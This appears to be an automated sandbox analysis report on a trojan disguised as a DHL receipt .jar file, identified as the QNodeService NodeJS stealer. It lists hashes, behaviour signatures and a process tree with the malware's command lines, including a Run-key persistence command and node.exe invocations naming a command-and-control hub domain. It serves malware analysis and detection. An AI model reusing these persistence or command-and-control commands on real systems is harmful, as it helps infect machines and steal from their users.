Analysis
- max time kernel: 150s
- max time network: 127s
- platform: windows10_x64
- resource: win10
- submitted: 26-10-2020 08:59
Static task: static1
Behavioral task: behavioral1
  Sample: DHL_10090AWB_09800123_RECIEPT00097 .jar
  Resource: win7
Behavioral task: behavioral2
  Sample: DHL_10090AWB_09800123_RECIEPT00097 .jar
  Resource: win10
General
- Target: DHL_10090AWB_09800123_RECIEPT00097 .jar
- Size: 74KB
- MD5: a754d565bf2979dc8a1e8963199fd466
- SHA1: 358b81c4665da96231c0b038a198eeedc905f36b
- SHA256: 7d652ebf3fc8f1368ff81ac8079ce332a8fde810bd4d7eca30a99196ba861114
- SHA512: f0ec805734aab2edf833ff9149e534e214cb926da0e453896af29a5a9ec8113c46703675460e7d28032cfae766c3c20a8b0de9843ab4b95444b7b2589cc6b065
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
- Executes dropped EXE (3 IoCs)
  pid   Process
  1904  node.exe
  192   node.exe
  4036  node.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  - Key created: \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Process: reg.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\c311ae97-2207-4a0f-824d-4c118b9cd9f5 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" (Process: reg.exe)
- JavaScript code in executable (3 IoCs)
  resource                                    yara_rule
  behavioral2/files/0x000100000001ab5b-173.dat  js
  behavioral2/files/0x000100000001ab5b-176.dat  js
  behavioral2/files/0x000100000001ab5b-180.dat  js
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  23    wtfismyip.com
  24    wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (Process: node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (Process: node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Process: node.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (Process: node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (Process: node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (Process: node.exe)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process   entries
  1904  node.exe  4
  192   node.exe  4
  4036  node.exe  10
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process    procid_target
  PID 3952 wrote to memory of 3724   3952  java.exe   75
  PID 3952 wrote to memory of 3724   3952  java.exe   75
  PID 3724 wrote to memory of 1904   3724  javaw.exe  79
  PID 3724 wrote to memory of 1904   3724  javaw.exe  79
  PID 1904 wrote to memory of 192    1904  node.exe   81
  PID 1904 wrote to memory of 192    1904  node.exe   81
  PID 192 wrote to memory of 4036    192   node.exe   82
  PID 192 wrote to memory of 4036    192   node.exe   82
  PID 4036 wrote to memory of 3776   4036  node.exe   84
  PID 4036 wrote to memory of 3776   4036  node.exe   84
  PID 3776 wrote to memory of 3284   3776  cmd.exe    85
  PID 3776 wrote to memory of 3284   3776  cmd.exe    85
Processes (nested by parent/child depth)
- C:\ProgramData\Oracle\Java\javapath\java.exe
  command line: java -jar "C:\Users\Admin\AppData\Local\Temp\DHL_10090AWB_09800123_RECIEPT00097 .jar"
  PID: 3952
  signatures: Suspicious use of WriteProcessMemory
  - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\d278f90a.tmp
    PID: 3724
    signatures: Suspicious use of WriteProcessMemory
    - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net
      PID: 1904
      signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net
        PID: 192
        signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
        - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net
          PID: 4036
          signatures: Executes dropped EXE; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe
            command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 3776
            signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\reg.exe
              command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 3284
              signatures: Adds Run key to start application